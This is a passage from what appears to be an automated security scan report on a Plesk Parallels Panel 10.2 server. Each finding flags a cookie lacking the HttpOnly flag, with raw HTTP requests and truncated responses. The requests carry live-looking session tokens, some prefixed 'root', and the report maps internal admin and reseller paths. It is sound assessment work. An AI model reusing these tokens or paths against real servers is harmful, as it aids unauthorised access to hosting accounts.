Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Sat, 24 Sep 2011 15:31:23 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=tools; path=/
Date: Sat, 24 Sep 2011 15:31:24 GMT
Server: sw-cp-server
Content-Length: 11602

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

5.46. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/item@0x59b7fd33ec13d9602b6ca6f628155d30/restore/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/backup/local-repository/item@0x59b7fd33ec13d9602b6ca6f628155d30/restore/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/backup/local-repository/item@0x59b7fd33ec13d9602b6ca6f628155d30/restore/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/
Cookie: backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:32:03 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=tools; path=/
Date: Sat, 24 Sep 2011 15:32:03 GMT
Server: sw-cp-server
Content-Length: 11595

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

5.47. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/item@0xa87588dacfbd85c954970348bf0b8c44/restore/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/backup/local-repository/item@0xa87588dacfbd85c954970348bf0b8c44/restore/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/backup/local-repository/item@0xa87588dacfbd85c954970348bf0b8c44/restore/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Sat, 24 Sep 2011 15:31:27 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=tools; path=/
Date: Sat, 24 Sep 2011 15:31:27 GMT
Server: sw-cp-server
Content-Length: 11607

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

5.48. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/item@0xbb4f4821ef1d0873e84ab40979c20b5d/restore/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/backup/local-repository/item@0xbb4f4821ef1d0873e84ab40979c20b5d/restore/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/backup/local-repository/item@0xbb4f4821ef1d0873e84ab40979c20b5d/restore/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/
Cookie: backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; locale=en-US; PHPSESSID=ed9056e995cbfbee61adf45504108ab4; psaContext=reseller-tools; BarExpanded=True

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:55:57 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=service-plans; path=/
Date: Sat, 24 Sep 2011 15:55:58 GMT
Server: sw-cp-server
Content-Length: 11535

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="071
...[SNIP]...

5.49. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/upload/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/backup/local-repository/upload/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/backup/local-repository/upload/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/
Cookie: backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:31:36 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=tools; path=/
Date: Sat, 24 Sep 2011 15:31:36 GMT
Server: sw-cp-server
Content-Length: 7624

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

5.50. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/schedule/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/backup/schedule/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/backup/schedule/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/
Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:31:46 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=tools; path=/
Date: Sat, 24 Sep 2011 15:31:46 GMT
Server: sw-cp-server
Content-Length: 13485

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

5.51. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/task@/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/backup/task@/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/backup/task@/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Sat, 24 Sep 2011 16:05:23 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=service-plans; path=/
Date: Sat, 24 Sep 2011 16:05:24 GMT
Server: sw-cp-server
Content-Length: 12815

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="094
...[SNIP]...

5.52. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/client@any/traffic/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/client@any/traffic/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/client@any/traffic/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools
Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=reseller-tools

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:27:13 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=reseller-tools; path=/
Date: Sat, 24 Sep 2011 15:27:13 GMT
Server: sw-cp-server
Content-Length: 16453

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

5.53. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/custom-buttons/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/custom-buttons/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/custom-buttons/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools
Cookie: custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=subscriptions

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:54:59 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=service-plans; path=/
Date: Sat, 24 Sep 2011 15:54:59 GMT
Server: sw-cp-server
Content-Length: 10916

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="1ab
...[SNIP]...

5.54. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/custom-buttons/custom-button@new/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/custom-buttons/custom-button@new/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/custom-buttons/custom-button@new/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 405 Method Not Allowed
Connection: close
Last-Modified: Sat, 24 Sep 2011 16:12:29 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=customers; path=/
Content-Length: 0
Date: Sat, 24 Sep 2011 16:12:29 GMT
Server: sw-cp-server


5.55. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/ftp-sessions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/ftp-sessions/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/ftp-sessions/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/sessions/
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Sat, 24 Sep 2011 16:05:22 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=service-plans; path=/
Date: Sat, 24 Sep 2011 16:05:23 GMT
Server: sw-cp-server
Content-Length: 11352

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="094
...[SNIP]...

5.56. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/preferences  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/preferences

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/preferences?context=interface-pref HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; psaContext=reseller-tools

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 14:16:08 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
